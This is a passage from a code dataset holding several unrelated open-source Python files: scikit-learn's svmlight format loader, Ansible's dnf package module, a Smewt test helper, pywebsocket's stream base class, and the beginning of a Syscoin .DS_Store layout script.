| repo_name | ref | path | copies | content |
|---|---|---|---|---|
JetBrains/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertTypeCommentToVariableAnnotationIntentionTest/assignmentWithComplexUnpacking.py
|
31
|
[y, (x, (z))] = undefined() # ty<caret>pe: Optional[Union[None, Any]], (Callable[..., int], Any)
|
yunfeilu/scikit-learn
|
refs/heads/master
|
sklearn/datasets/svmlight_format.py
|
79
|
"""This module implements a loader and dumper for the svmlight format
This format is a text-based format, with one sample per line. It does
not store zero-valued features, and hence is suitable for sparse datasets.
The first element of each line can be used to store a target variable to
predict.
This format is used as the default format for both svmlight and the
libsvm command line programs.
"""
# Authors: Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# Olivier Grisel <olivier.grisel@ensta.org>
# License: BSD 3 clause
from contextlib import closing
import io
import os.path
import numpy as np
import scipy.sparse as sp
from ._svmlight_format import _load_svmlight_file
from .. import __version__
from ..externals import six
from ..externals.six import u, b
from ..externals.six.moves import range, zip
from ..utils import check_array
from ..utils.fixes import frombuffer_empty
def load_svmlight_file(f, n_features=None, dtype=np.float64,
multilabel=False, zero_based="auto", query_id=False):
"""Load datasets in the svmlight / libsvm format into sparse CSR matrix
This format is a text-based format, with one sample per line. It does
not store zero-valued features, and hence is suitable for sparse datasets.
The first element of each line can be used to store a target variable
to predict.
This format is used as the default format for both svmlight and the
libsvm command line programs.
Parsing a text-based source can be expensive. When working
repeatedly on the same dataset, it is recommended to wrap this
loader with joblib.Memory.cache to store a memmapped backup of the
CSR results of the first call and benefit from the near instantaneous
loading of memmapped structures for the subsequent calls.
In case the file contains pairwise preference constraints (known
as "qid" in the svmlight format), these are ignored unless the
query_id parameter is set to True. These pairwise preference
constraints can be used to constrain the combination of samples
when using pairwise loss functions (as is the case in some
learning to rank problems) so that only pairs with the same
query_id value are considered.
This implementation is written in Cython and is reasonably fast.
However, a faster API-compatible loader is also available at:
https://github.com/mblondel/svmlight-loader
Parameters
----------
f : {str, file-like, int}
(Path to) a file to load. If a path ends in ".gz" or ".bz2", it will
be uncompressed on the fly. If an integer is passed, it is assumed to
be a file descriptor. A file-like or file descriptor will not be closed
by this function. A file-like object must be opened in binary mode.
n_features : int or None
The number of features to use. If None, it will be inferred. This
argument is useful to load several files that are subsets of a
bigger sliced dataset: each subset might not have examples of
every feature, hence the inferred shape might vary from one
slice to another.
multilabel : boolean, optional, default False
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
zero_based : boolean or "auto", optional, default "auto"
Whether column indices in f are zero-based (True) or one-based
(False). If column indices are one-based, they are transformed to
zero-based to match Python/NumPy conventions.
If set to "auto", a heuristic check is applied to determine this from
the file contents. Both kinds of files occur "in the wild", but they
are unfortunately not self-identifying. Using "auto" or True should
always be safe.
query_id : boolean, default False
If True, will return the query_id array for each file.
dtype : numpy data type, default np.float64
Data type of dataset to be loaded. This will be the data type of the
output numpy arrays ``X`` and ``y``.
Returns
-------
X: scipy.sparse matrix of shape (n_samples, n_features)
y : ndarray of shape (n_samples,), or, in the multilabel case, a list of
tuples of length n_samples.
query_id: array of shape (n_samples,)
query_id for each sample. Only returned when query_id is set to
True.
See also
--------
load_svmlight_files: similar function for loading multiple files in this
format, enforcing the same number of features/columns on all of them.
Examples
--------
To use joblib.Memory to cache the svmlight file::

    from sklearn.externals.joblib import Memory
    from sklearn.datasets import load_svmlight_file
    mem = Memory("./mycache")

    @mem.cache
    def get_data():
        data = load_svmlight_file("mysvmlightfile")
        return data[0], data[1]

    X, y = get_data()
"""
return tuple(load_svmlight_files([f], n_features, dtype, multilabel,
zero_based, query_id))
def _gen_open(f):
if isinstance(f, int): # file descriptor
return io.open(f, "rb", closefd=False)
elif not isinstance(f, six.string_types):
raise TypeError("expected {str, int, file-like}, got %s" % type(f))
_, ext = os.path.splitext(f)
if ext == ".gz":
import gzip
return gzip.open(f, "rb")
elif ext == ".bz2":
from bz2 import BZ2File
return BZ2File(f, "rb")
else:
return open(f, "rb")
def _open_and_load(f, dtype, multilabel, zero_based, query_id):
if hasattr(f, "read"):
actual_dtype, data, ind, indptr, labels, query = \
_load_svmlight_file(f, dtype, multilabel, zero_based, query_id)
# XXX remove closing when Python 2.7+/3.1+ required
else:
with closing(_gen_open(f)) as f:
actual_dtype, data, ind, indptr, labels, query = \
_load_svmlight_file(f, dtype, multilabel, zero_based, query_id)
# convert from array.array, give data the right dtype
if not multilabel:
labels = frombuffer_empty(labels, np.float64)
data = frombuffer_empty(data, actual_dtype)
indices = frombuffer_empty(ind, np.intc)
indptr = np.frombuffer(indptr, dtype=np.intc) # never empty
query = frombuffer_empty(query, np.intc)
data = np.asarray(data, dtype=dtype) # no-op for float{32,64}
return data, indices, indptr, labels, query
def load_svmlight_files(files, n_features=None, dtype=np.float64,
multilabel=False, zero_based="auto", query_id=False):
"""Load dataset from multiple files in SVMlight format
This function is equivalent to mapping load_svmlight_file over a list of
files, except that the results are concatenated into a single, flat list
and the sample vectors are constrained to all have the same number of
features.
In case the file contains pairwise preference constraints (known
as "qid" in the svmlight format), these are ignored unless the
query_id parameter is set to True. These pairwise preference
constraints can be used to constrain the combination of samples
when using pairwise loss functions (as is the case in some
learning to rank problems) so that only pairs with the same
query_id value are considered.
Parameters
----------
files : iterable over {str, file-like, int}
(Paths of) files to load. If a path ends in ".gz" or ".bz2", it will
be uncompressed on the fly. If an integer is passed, it is assumed to
be a file descriptor. File-likes and file descriptors will not be
closed by this function. File-like objects must be opened in binary
mode.
n_features: int or None
The number of features to use. If None, it will be inferred from the
maximum column index occurring in any of the files.
This can be set to a higher value than the actual number of features
in any of the input files, but setting it to a lower value will cause
an exception to be raised.
multilabel: boolean, optional
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
zero_based: boolean or "auto", optional
Whether column indices in f are zero-based (True) or one-based
(False). If column indices are one-based, they are transformed to
zero-based to match Python/NumPy conventions.
If set to "auto", a heuristic check is applied to determine this from
the file contents. Both kinds of files occur "in the wild", but they
are unfortunately not self-identifying. Using "auto" or True should
always be safe.
query_id: boolean, defaults to False
If True, will return the query_id array for each file.
dtype : numpy data type, default np.float64
Data type of dataset to be loaded. This will be the data type of the
output numpy arrays ``X`` and ``y``.
Returns
-------
[X1, y1, ..., Xn, yn]
where each (Xi, yi) pair is the result from load_svmlight_file(files[i]).
If query_id is set to True, this will return instead [X1, y1, q1,
..., Xn, yn, qn] where (Xi, yi, qi) is the result from
load_svmlight_file(files[i])
Notes
-----
When fitting a model to a matrix X_train and evaluating it against a
matrix X_test, it is essential that X_train and X_test have the same
number of features (X_train.shape[1] == X_test.shape[1]). This may not
be the case if you load the files individually with load_svmlight_file.
See also
--------
load_svmlight_file
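Examples
--------
A minimal sketch (illustrative; assumes "train.svm" and "test.svm" exist
and use the same label/feature conventions)::

    from sklearn.datasets import load_svmlight_files
    X_train, y_train, X_test, y_test = load_svmlight_files(
        ("train.svm", "test.svm"))
    assert X_train.shape[1] == X_test.shape[1]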
"""
r = [_open_and_load(f, dtype, multilabel, bool(zero_based), bool(query_id))
for f in files]
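# Heuristic for index offsets: if the caller said the files are one-based
# (zero_based=False), or asked for "auto" and no zero column index was ever
# seen, shift every index down by one to follow NumPy's zero-based convention.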
if (zero_based is False
or zero_based == "auto" and all(np.min(tmp[1]) > 0 for tmp in r)):
for ind in r:
indices = ind[1]
indices -= 1
n_f = max(ind[1].max() for ind in r) + 1
if n_features is None:
n_features = n_f
elif n_features < n_f:
raise ValueError("n_features was set to {},"
" but input file contains {} features"
.format(n_features, n_f))
result = []
for data, indices, indptr, y, query_values in r:
shape = (indptr.shape[0] - 1, n_features)
X = sp.csr_matrix((data, indices, indptr), shape)
X.sort_indices()
result += X, y
if query_id:
result.append(query_values)
return result
def _dump_svmlight(X, y, f, multilabel, one_based, comment, query_id):
is_sp = int(hasattr(X, "tocsr"))
if X.dtype.kind == 'i':
value_pattern = u("%d:%d")
else:
value_pattern = u("%d:%.16g")
if y.dtype.kind == 'i':
label_pattern = u("%d")
else:
label_pattern = u("%.16g")
line_pattern = u("%s")
if query_id is not None:
line_pattern += u(" qid:%d")
line_pattern += u(" %s\n")
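# Each emitted line therefore has the layout
# "<label>[ qid:<qid>] <index>:<value> <index>:<value> ...\n".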
if comment:
f.write(b("# Generated by dump_svmlight_file from scikit-learn %s\n"
% __version__))
f.write(b("# Column indices are %s-based\n"
% ["zero", "one"][one_based]))
f.write(b("#\n"))
f.writelines(b("# %s\n" % line) for line in comment.splitlines())
for i in range(X.shape[0]):
if is_sp:
span = slice(X.indptr[i], X.indptr[i + 1])
row = zip(X.indices[span], X.data[span])
else:
nz = X[i] != 0
row = zip(np.where(nz)[0], X[i, nz])
s = " ".join(value_pattern % (j + one_based, x) for j, x in row)
if multilabel:
nz_labels = np.where(y[i] != 0)[0]
labels_str = ",".join(label_pattern % j for j in nz_labels)
else:
labels_str = label_pattern % y[i]
if query_id is not None:
feat = (labels_str, query_id[i], s)
else:
feat = (labels_str, s)
f.write((line_pattern % feat).encode('ascii'))
def dump_svmlight_file(X, y, f, zero_based=True, comment=None, query_id=None,
multilabel=False):
"""Dump the dataset in svmlight / libsvm file format.
This format is a text-based format, with one sample per line. It does
not store zero-valued features, and hence is suitable for sparse datasets.
The first element of each line can be used to store a target variable
to predict.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_labels]
Target values. Class labels must be an integer or float, or array-like
objects of integer or float for multilabel classifications.
f : string or file-like in binary mode
If string, specifies the path that will contain the data.
If file-like, data will be written to f. f should be opened in binary
mode.
zero_based : boolean, optional
Whether column indices should be written zero-based (True) or one-based
(False).
comment : string, optional
Comment to insert at the top of the file. This should be either a
Unicode string, which will be encoded as UTF-8, or an ASCII byte
string.
If a comment is given, then it will be preceded by one that identifies
the file as having been dumped by scikit-learn. Note that not all
tools grok comments in SVMlight files.
query_id : array-like, shape = [n_samples]
Array containing pairwise preference constraints (qid in svmlight
format).
multilabel: boolean, optional
Samples may have several labels each (see
http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/multilabel.html)
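Examples
--------
A minimal usage sketch (illustrative; the output path is arbitrary)::

    import numpy as np
    from sklearn.datasets import dump_svmlight_file
    X = np.array([[0.0, 1.5], [2.0, 0.0]])
    y = np.array([1, -1])
    with open("data.svm", "wb") as f:
        dump_svmlight_file(X, y, f)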
"""
if comment is not None:
# Convert comment string to list of lines in UTF-8.
# If a byte string is passed, then check whether it's ASCII;
# if a user wants to get fancy, they'll have to decode themselves.
# Avoid mention of str and unicode types for Python 3.x compat.
if isinstance(comment, bytes):
comment.decode("ascii") # just for the exception
else:
comment = comment.encode("utf-8")
if six.b("\0") in comment:
raise ValueError("comment string contains NUL byte")
y = np.asarray(y)
if y.ndim != 1 and not multilabel:
raise ValueError("expected y of shape (n_samples,), got %r"
% (y.shape,))
Xval = check_array(X, accept_sparse='csr')
if Xval.shape[0] != y.shape[0]:
raise ValueError("X.shape[0] and y.shape[0] should be the same, got"
" %r and %r instead." % (Xval.shape[0], y.shape[0]))
# We had some issues with CSR matrices with unsorted indices (e.g. #1501),
# so sort them here, but first make sure we don't modify the user's X.
# TODO We can do this cheaper; sorted_indices copies the whole matrix.
if Xval is X and hasattr(Xval, "sorted_indices"):
X = Xval.sorted_indices()
else:
X = Xval
if hasattr(X, "sort_indices"):
X.sort_indices()
if query_id is not None:
query_id = np.asarray(query_id)
if query_id.shape[0] != y.shape[0]:
raise ValueError("expected query_id of shape (n_samples,), got %r"
% (query_id.shape,))
one_based = not zero_based
if hasattr(f, "write"):
_dump_svmlight(X, y, f, multilabel, one_based, comment, query_id)
else:
with open(f, "wb") as f:
_dump_svmlight(X, y, f, multilabel, one_based, comment, query_id)
|
tjanez/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/dnf.py
|
25
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Cristian van Ee <cristian at cvee.org>
# Copyright 2015 Igor Gnatenko <i.gnatenko.brain@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'core',
'version': '1.0'}
DOCUMENTATION = '''
---
module: dnf
version_added: 1.9
short_description: Manages packages with the I(dnf) package manager
description:
- Installs, upgrades, removes, and lists packages and groups with the I(dnf) package manager.
options:
name:
description:
- "Package name, or package specifier with version, like C(name-1.0). When using state=latest, this can be '*' which means run: dnf -y update. You can also pass a url or a local path to a rpm file."
required: true
default: null
aliases: []
list:
description:
- Various (non-idempotent) commands for usage with C(/usr/bin/ansible) and I(not) playbooks. See examples.
required: false
default: null
state:
description:
- Whether to install (C(present), C(latest)), or remove (C(absent)) a package.
required: false
choices: [ "present", "latest", "absent" ]
default: "present"
enablerepo:
description:
- I(Repoid) of repositories to enable for the install/update operation.
These repos will not persist beyond the transaction.
When specifying multiple repos, separate them with a ",".
required: false
default: null
aliases: []
disablerepo:
description:
- I(Repoid) of repositories to disable for the install/update operation.
These repos will not persist beyond the transaction.
When specifying multiple repos, separate them with a ",".
required: false
default: null
aliases: []
conf_file:
description:
- The remote dnf configuration file to use for the transaction.
required: false
default: null
aliases: []
disable_gpg_check:
description:
- Whether to disable the GPG checking of signatures of packages being
installed. Has an effect only if state is I(present) or I(latest).
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
installroot:
description:
- Specifies an alternative installroot, relative to which all packages
will be installed.
required: false
version_added: "2.3"
default: "/"
notes: []
# informational: requirements for nodes
requirements:
- "python >= 2.6"
- python-dnf
author:
- '"Igor Gnatenko (@ignatenkobrain)" <i.gnatenko.brain@gmail.com>'
- '"Cristian van Ee (@DJMuggs)" <cristian at cvee.org>'
- "Berend De Schouwer (github.com/berenddeschouwer)"
'''
EXAMPLES = '''
- name: install the latest version of Apache
dnf:
name: httpd
state: latest
- name: remove the Apache package
dnf:
name: httpd
state: absent
- name: install the latest version of Apache from the testing repo
dnf:
name: httpd
enablerepo: testing
state: present
- name: upgrade all packages
dnf:
name: "*"
state: latest
- name: install the nginx rpm from a remote repo
dnf:
name: 'http://nginx.org/packages/centos/6/noarch/RPMS/nginx-release-centos-6-0.el6.ngx.noarch.rpm'
state: present
- name: install nginx rpm from a local file
dnf:
name: /usr/local/src/nginx-release-centos-6-0.el6.ngx.noarch.rpm
state: present
- name: install the 'Development tools' package group
dnf:
name: '@Development tools'
state: present
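# Illustrative sketch only: exercising the installroot and disablerepo
# options documented above (the path and repo id are placeholders)
- name: install the Apache package into an alternative installroot
  dnf:
    name: httpd
    state: present
    installroot: /tmp/chroot
    disablerepo: updates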
'''
import os
try:
import dnf
import dnf.cli
import dnf.const
import dnf.exceptions
import dnf.subject
import dnf.util
HAS_DNF = True
except ImportError:
HAS_DNF = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import PY2
def _ensure_dnf(module):
if not HAS_DNF:
if PY2:
package = 'python2-dnf'
else:
package = 'python3-dnf'
if module.check_mode:
module.fail_json(msg="`{0}` is not installed, but it is required"
" for the Ansible dnf module.".format(package))
module.run_command(['dnf', 'install', '-y', package], check_rc=True)
global dnf
try:
import dnf
import dnf.cli
import dnf.const
import dnf.exceptions
import dnf.subject
import dnf.util
except ImportError:
module.fail_json(msg="Could not import the dnf python module."
" Please install `{0}` package.".format(package))
def _configure_base(module, base, conf_file, disable_gpg_check, installroot='/'):
"""Configure the dnf Base object."""
conf = base.conf
# Turn off debug messages in the output
conf.debuglevel = 0
# Set whether to check gpg signatures
conf.gpgcheck = not disable_gpg_check
# Don't prompt for user confirmations
conf.assumeyes = True
# Set installroot
conf.installroot = installroot
# Change the configuration file path if provided
if conf_file:
# Fail if we can't read the configuration file.
if not os.access(conf_file, os.R_OK):
module.fail_json(
msg="cannot read configuration file", conf_file=conf_file)
else:
conf.config_file_path = conf_file
# Read the configuration file
conf.read()
def _specify_repositories(base, disablerepo, enablerepo):
"""Enable and disable repositories matching the provided patterns."""
base.read_all_repos()
repos = base.repos
# Disable repositories
for repo_pattern in disablerepo:
for repo in repos.get_matching(repo_pattern):
repo.disable()
# Enable repositories
for repo_pattern in enablerepo:
for repo in repos.get_matching(repo_pattern):
repo.enable()
def _base(module, conf_file, disable_gpg_check, disablerepo, enablerepo, installroot):
"""Return a fully configured dnf Base object."""
base = dnf.Base()
_configure_base(module, base, conf_file, disable_gpg_check, installroot)
_specify_repositories(base, disablerepo, enablerepo)
base.fill_sack(load_system_repo='auto')
return base
def _package_dict(package):
"""Return a dictionary of information for the package."""
# NOTE: This no longer contains the 'dnfstate' field because it is
# already known based on the query type.
result = {
'name': package.name,
'arch': package.arch,
'epoch': str(package.epoch),
'release': package.release,
'version': package.version,
'repo': package.repoid}
result['nevra'] = '{epoch}:{name}-{version}-{release}.{arch}'.format(
**result)
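# Illustrative example of the resulting NEVRA string: '0:httpd-2.4.6-45.el7.x86_64'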
return result
def list_items(module, base, command):
"""List package info based on the command."""
# Rename updates to upgrades
if command == 'updates':
command = 'upgrades'
# Return the corresponding packages
if command in ['installed', 'upgrades', 'available']:
results = [
_package_dict(package)
for package in getattr(base.sack.query(), command)()]
# Return the enabled repository ids
elif command in ['repos', 'repositories']:
results = [
{'repoid': repo.id, 'state': 'enabled'}
for repo in base.repos.iter_enabled()]
# Return any matching packages
else:
packages = dnf.subject.Subject(command).get_best_query(base.sack)
results = [_package_dict(package) for package in packages]
module.exit_json(results=results)
def _mark_package_install(module, base, pkg_spec):
"""Mark the package for install."""
try:
base.install(pkg_spec)
except dnf.exceptions.MarkingError:
module.fail_json(msg="No package {} available.".format(pkg_spec))
def _parse_spec_group_file(names):
pkg_specs, grp_specs, filenames = [], [], []
for name in names:
if name.endswith(".rpm"):
filenames.append(name)
elif name.startswith("@"):
grp_specs.append(name[1:])
else:
pkg_specs.append(name)
return pkg_specs, grp_specs, filenames
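# For illustration: _parse_spec_group_file(['nginx', '@Development tools', '/tmp/foo.rpm'])
# returns (['nginx'], ['Development tools'], ['/tmp/foo.rpm']).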
def _install_remote_rpms(base, filenames):
if int(dnf.__version__.split(".")[0]) >= 2:
pkgs = list(sorted(base.add_remote_rpms(list(filenames)), reverse=True))
else:
pkgs = []
for filename in filenames:
pkgs.append(base.add_remote_rpm(filename))
for pkg in pkgs:
base.package_install(pkg)
def ensure(module, base, state, names):
# Accumulate failures. Package management modules install what they can
# and fail with a message about what they can't.
failures = []
allow_erasing = False
if names == ['*'] and state == 'latest':
base.upgrade_all()
else:
pkg_specs, group_specs, filenames = _parse_spec_group_file(names)
if group_specs:
base.read_comps()
pkg_specs = [p.strip() for p in pkg_specs]
filenames = [f.strip() for f in filenames]
groups = []
environments = []
for group_spec in (g.strip() for g in group_specs):
group = base.comps.group_by_pattern(group_spec)
if group:
groups.append(group)
else:
environment = base.comps.environment_by_pattern(group_spec)
if environment:
environments.append(environment.id)
else:
module.fail_json(
msg="No group {} available.".format(group_spec))
if state in ['installed', 'present']:
# Install files.
_install_remote_rpms(base, filenames)
# Install groups.
for group in groups:
try:
base.group_install(group, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
# In dnf 2.0 if all the mandatory packages in a group do
# not install, an error is raised. We want to capture
# this but still install as much as possible.
failures.append((group, e))
for environment in environments:
try:
base.environment_install(environment, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((environment, e))
# Install packages.
for pkg_spec in pkg_specs:
_mark_package_install(module, base, pkg_spec)
elif state == 'latest':
# "latest" is same as "installed" for filenames.
_install_remote_rpms(base, filenames)
for group in groups:
try:
try:
base.group_upgrade(group)
except dnf.exceptions.CompsError:
# If not already installed, try to install.
base.group_install(group, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((group, e))
for environment in environments:
try:
try:
base.environment_upgrade(environment)
except dnf.exceptions.CompsError:
# If not already installed, try to install.
base.environment_install(environment, dnf.const.GROUP_PACKAGE_TYPES)
except dnf.exceptions.Error as e:
failures.append((environment, e))
for pkg_spec in pkg_specs:
# best=True makes dnf install the latest available package
# even if the package was not previously installed
base.conf.best = True
base.install(pkg_spec)
else:
# state == absent
if filenames:
module.fail_json(
msg="Cannot remove paths -- please specify package name.")
for group in groups:
try:
base.group_remove(group)
except dnf.exceptions.CompsError:
# Group is already uninstalled.
pass
for environment in environments:
try:
base.environment_remove(environment)
except dnf.exceptions.CompsError:
# Environment is already uninstalled.
pass
installed = base.sack.query().installed()
for pkg_spec in pkg_specs:
if installed.filter(name=pkg_spec):
base.remove(pkg_spec)
# Like the dnf CLI we want to allow recursive removal of dependent
# packages
allow_erasing = True
if not base.resolve(allow_erasing=allow_erasing):
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(msg="Nothing to do")
else:
if module.check_mode:
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(changed=True)
base.download_packages(base.transaction.install_set)
base.do_transaction()
response = {'changed': True, 'results': []}
for package in base.transaction.install_set:
response['results'].append("Installed: {0}".format(package))
for package in base.transaction.remove_set:
response['results'].append("Removed: {0}".format(package))
if failures:
module.fail_json(msg='Failed to install some of the specified packages',
failures=failures)
module.exit_json(**response)
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=['pkg'], type='list'),
state=dict(
default='installed',
choices=[
'absent', 'present', 'installed', 'removed', 'latest']),
enablerepo=dict(type='list', default=[]),
disablerepo=dict(type='list', default=[]),
list=dict(),
conf_file=dict(default=None, type='path'),
disable_gpg_check=dict(default=False, type='bool'),
installroot=dict(default='/', type='path'),
),
required_one_of=[['name', 'list']],
mutually_exclusive=[['name', 'list']],
supports_check_mode=True)
params = module.params
_ensure_dnf(module)
if params['list']:
base = _base(
module, params['conf_file'], params['disable_gpg_check'],
params['disablerepo'], params['enablerepo'], params['installroot'])
list_items(module, base, params['list'])
else:
# Note: base takes a long time to run so we want to check for failure
# before running it.
if not dnf.util.am_i_root():
module.fail_json(msg="This command has to be run under the root user.")
base = _base(
module, params['conf_file'], params['disable_gpg_check'],
params['disablerepo'], params['enablerepo'], params['installroot'])
ensure(module, base, params['state'], params['name'])
if __name__ == '__main__':
main()
|
wackou/smewt
|
refs/heads/master
|
smewt/test/smewttest.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2008 Nicolas Wack <wackou@smewt.com>
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from unittest import *
from unittest import TestCase as BaseTestCase
import yaml, logging, sys, os
from os.path import *
MAIN_LOGGING_LEVEL = logging.WARNING
from utils.slogging import setupLogging
setupLogging()
logging.getLogger().setLevel(MAIN_LOGGING_LEVEL)
# we most likely never want this to be in debug mode, as it spits out way too much information
if MAIN_LOGGING_LEVEL == logging.DEBUG:
logging.getLogger('pygoo').setLevel(logging.INFO)
def currentPath():
'''Returns the path in which the calling file is located.'''
return dirname(join(os.getcwd(), sys._getframe(1).f_globals['__file__']))
def addImportPath(path):
'''Function that adds the specified path to the import path. The path can be
absolute or relative to the calling file.'''
importPath = abspath(join(currentPath(), path))
sys.path = [ importPath ] + sys.path
addImportPath('.') # for the tests
addImportPath('../..') # for import smewt
import smewt
from smewt import *
from pygoo import *
from smewt.solvers import *
from smewt.guessers import *
from smewt.media import *
# before starting any tests, save smewt's default ontology in case we mess with it and need it again later
ontology.save_current_ontology('media')
from smewt.base import cache
cache.load('/tmp/smewt.cache')
def shutdown():
cache.save('/tmp/smewt.cache')
def allTests(testClass):
return TestLoader().loadTestsFromTestCase(testClass)
|
raviflipsyde/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/_stream_base.py
|
652
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Base stream class.
"""
# Note: request.connection.write/read are used in this module, even though
# mod_python document says that they should be used only in connection
# handlers. Unfortunately, we have no other options. For example,
# request.write/read are not suitable because they don't allow direct raw bytes
# writing/reading.
import socket
from mod_pywebsocket import util
# Exceptions
class ConnectionTerminatedException(Exception):
"""This exception will be raised when a connection is terminated
unexpectedly.
"""
pass
class InvalidFrameException(ConnectionTerminatedException):
"""This exception will be raised when we received an invalid frame we
cannot parse.
"""
pass
class BadOperationException(Exception):
"""This exception will be raised when send_message() is called on
server-terminated connection or receive_message() is called on
client-terminated connection.
"""
pass
class UnsupportedFrameException(Exception):
"""This exception will be raised when we receive a frame with flag, opcode
we cannot handle. Handlers can just catch and ignore this exception and
call receive_message() again to continue processing the next frame.
"""
pass
class InvalidUTF8Exception(Exception):
"""This exception will be raised when we receive a text frame which
contains invalid UTF-8 strings.
"""
pass
class StreamBase(object):
"""Base stream class."""
def __init__(self, request):
"""Construct an instance.
Args:
request: mod_python request.
"""
self._logger = util.get_class_logger(self)
self._request = request
def _read(self, length):
"""Reads length bytes from connection. In case we catch any exception,
prepends remote address to the exception message and raise again.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
try:
read_bytes = self._request.connection.read(length)
if not read_bytes:
raise ConnectionTerminatedException(
'Receiving %d byte failed. Peer (%r) closed connection' %
(length, (self._request.connection.remote_addr,)))
return read_bytes
except socket.error, e:
# Catch a socket.error. Because it's not a child class of the
# IOError prior to Python 2.6, we cannot omit this except clause.
# Use %s rather than %r for the exception to use human friendly
# format.
raise ConnectionTerminatedException(
'Receiving %d byte failed. socket.error (%s) occurred' %
(length, e))
except IOError, e:
# Also catch an IOError because mod_python throws it.
raise ConnectionTerminatedException(
'Receiving %d byte failed. IOError (%s) occurred' %
(length, e))
def _write(self, bytes_to_write):
"""Writes given bytes to connection. In case we catch any exception,
prepends remote address to the exception message and raise again.
"""
try:
self._request.connection.write(bytes_to_write)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._request.connection.remote_addr,),
e)
raise
def receive_bytes(self, length):
"""Receives multiple bytes. Retries read when we couldn't receive the
specified amount.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
read_bytes = []
while length > 0:
new_read_bytes = self._read(length)
read_bytes.append(new_read_bytes)
length -= len(new_read_bytes)
return ''.join(read_bytes)
def _read_until(self, delim_char):
"""Reads bytes until we encounter delim_char. The result will not
contain delim_char.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
read_bytes = []
while True:
ch = self._read(1)
if ch == delim_char:
break
read_bytes.append(ch)
return ''.join(read_bytes)
# vi:sts=4 sw=4 et
|
syscoin/syscoin2
|
refs/heads/master
|
contrib/macdeploy/custom_dsstore.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
